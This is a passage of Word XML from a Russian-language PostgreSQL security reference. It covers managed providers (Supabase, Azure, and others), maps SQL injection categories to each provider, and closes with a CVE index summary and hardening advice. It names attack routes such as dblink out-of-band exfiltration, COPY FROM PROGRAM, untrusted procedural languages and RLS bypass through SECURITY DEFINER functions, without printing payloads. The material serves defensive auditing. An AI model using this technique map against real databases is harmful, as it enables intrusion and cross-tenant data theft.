          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement = mod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 настраиваются.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Private IP / VPC peering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный паттерн в Cloud SQL; outbound network ограничения аналогично RDS VPC security groups.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Авто-апдейты major version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — opt-in; minor — обычно автоматические в maintenance window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supabase управляет PostgreSQL через Kubernetes-deployment; patch policy variable между tenant tiers (Free / Pro / Team / Enterprise) и реальное состояние сильнее всего отстаёт от upstream — в некоторых production deployments наблюдается отставание в 4+ minor. Maintenance window не настраивается tenant-ом; патчи происходят на provider's schedule. Версия видна через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">always check before assuming patch-level</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Архитектурный context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">массово использует SECURITY DEFINER функции для RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgREST RPC pattern. Типичный flow: REST-запрос → PostgREST → вызов SD-функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.uid()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auth.jwt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> check внутри. Это структурно создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">direct exposure на 3.17.5 (SECURITY DEFINER + RLS bypass для owner)</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Невозможные категории.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Аналогично RDS / Cloud SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-specific quirks.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PostgREST RPC pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — критичная разница vs RDS / Cloud SQL: web-application нередко </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">single-step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через PostgREST без application middleware. Это означает что SQL injection в PostgREST RPC argument попадает непосредственно в SD-функцию.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`auth.uid()` / `auth.jwt()` filters внутри SD-функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Supabase doc recommendation. Если разработчик пропускает — direct cross-tenant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`FORCE ROW LEVEL SECURITY`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекомендован Supabase, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не enforced by default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Audit на adherence — critical для production tenants.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Anonymous role (`anon`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — публичный API key даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">anon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> role доступ. RLS policy должна явно запретить.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Azure Database for PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Database for PostgreSQL — patch lag близок к RDS (1–2 minor от upstream). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`azure_pg_admin`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — equivalent к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(НЕ полный superuser). Maintenance window настраивается в Azure Portal per-instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Невозможные категории.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Аналогично прочим managed-провайдерам.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-specific quirks.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Azure AD authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — опциональный заменитель password-auth; добавляет attack surface на token-uniqueness, но снимает offline password-cracking class.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`pgaudit` extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекомендуется enable для production; даёт fine-grained audit logs (см. 5.6).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Flexible Server vs Single Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — две версии Azure deployment; security baseline различается, проверять doc для конкретного типа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная матрица: категория × provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Легенда: «да» — применимо; «нет» — структурно не применимо (нужный privilege недоступен tenant-у); «огр.» — ограничено или зависит от config / version; «риск» — elevated risk через provider-specific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RDS / Aurora</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Cloud SQL</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Supabase</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Azure</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Self-hosted</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 UNION-based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 Error-based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3.3 Boolean blind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 Time-based blind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 Stacked queries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3.6.1 dblink OOB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 (no ext)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3.6.2 postgres_fdw SSRF</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3.6.3 pg_read_server_files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3.6.4 lo_import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COPY FROM PROGRAM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 plperlu</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3.7.3 plpython3u</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нет</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 Metadata extraction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 Filter bypass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 Data-modifying CTE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 Type-casting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 Comments / newlines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 Priv-escalation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 (rds_su)</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 LIMIT/OFFSET/ORDER BY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 LIKE/tsquery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 Identifier injection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3.17.1 RLS subquery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3.17.2 MERGE RLS (15.0–15.3)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 (зависит от minor)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3.17.3 SET ROLE reset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3.17.4 Optimizer stats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да</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3.17.5 SD + RLS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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">риск</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (PostgREST pattern)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огр.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Универсальные рекомендации для managed-deployments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Всегда checking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для верификации patch level — provider patch lag реальный, в console часто отстаёт от реального состояния.</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на critical tables — defence-in-depth против 3.17.5 и unknown future CVE.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extension — стандартный audit logging; настраивается во всех 4 провайдерах (см. 5.6).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Не использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds_superuser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cloudsqlsuperuser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azure_pg_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как owner для application tables и SD-функций — это создаёт SECURITY DEFINER + bypass-RLS combo.</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ограничен по умолчанию во всех 4 — это feature, не bug. Не workaround-ить через privilege escalation requests к provider support; пересмотреть архитектурное решение, если требуется dblink или fdw.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Для CVE-2024-4317 (R17) — отдельно проверить, что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запущен во всех БД (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template0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template1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); provider обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> делает этого автоматически.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В Supabase — audit на adherence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.uid()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auth.jwt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter-pattern внутри всех SD-функций; missing filter = direct cross-tenant leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари раздела 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел 4 — хронологический индекс CVE PostgreSQL 2022–2026. 28 R-якорей из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sources/research.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> собраны в одно место в порядке релизов. Большинство уже разобраны полными карточками в категориях 3.X.N (категорийный взгляд: «как эта инъекция работает»); раздел 4 даёт хронологический взгляд: «когда что починили».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Статистика по 28 R-якорям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Полные карточки в 3.X.N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (категорийный якорь + полное описание): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">22 R-якоря</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R1 (3.6.1), R2 (3.6.2), R3 (3.7.1), R4 (3.6.3 / 3.6.4), R5 (3.9.1), R6 (3.9.7), R7 (3.7.2b), R8 (3.13.1 / 3.17.3), R9 (3.17.1), R11 (3.17.2), R12 (3.13.2), R15 (3.13.3), R16 (3.13.4), R17 (3.8.6), R18 (3.16.1), R19 (3.2), R20 (3.5), R21 (3.7.1 + 3.9.7), R22 (3.10.1), R25 (3.12.3), R26 (3.17.4), R28 (2.3 / 3.13.5).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Полные карточки в разделе 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE без 3.X.N-якоря): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6 R-якорей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R10 (4.4), R13 (4.3), R14 (4.3), R23 (4.5), R24 (4.5), R27 (4.5).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Features / patterns / disputed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (нет CVE-status или нет patched-minor): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10 R-якорей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R1, R2, R3 (disputed CVE-2019-9193), R4, R5 (features); R18, R19, R20, R22 (patterns); R28 (feature, не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Из 28 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">18 имеют реальный CVE-номер и patched minor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (R6, R7, R8, R9, R10, R11, R12, R13, R14, R15, R16, R17, R21 = chain-вариант R6, R23, R24, R25, R26, R27).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Топ-3 batch-релиза 2022–2025 по широте охвата</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14.11.2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
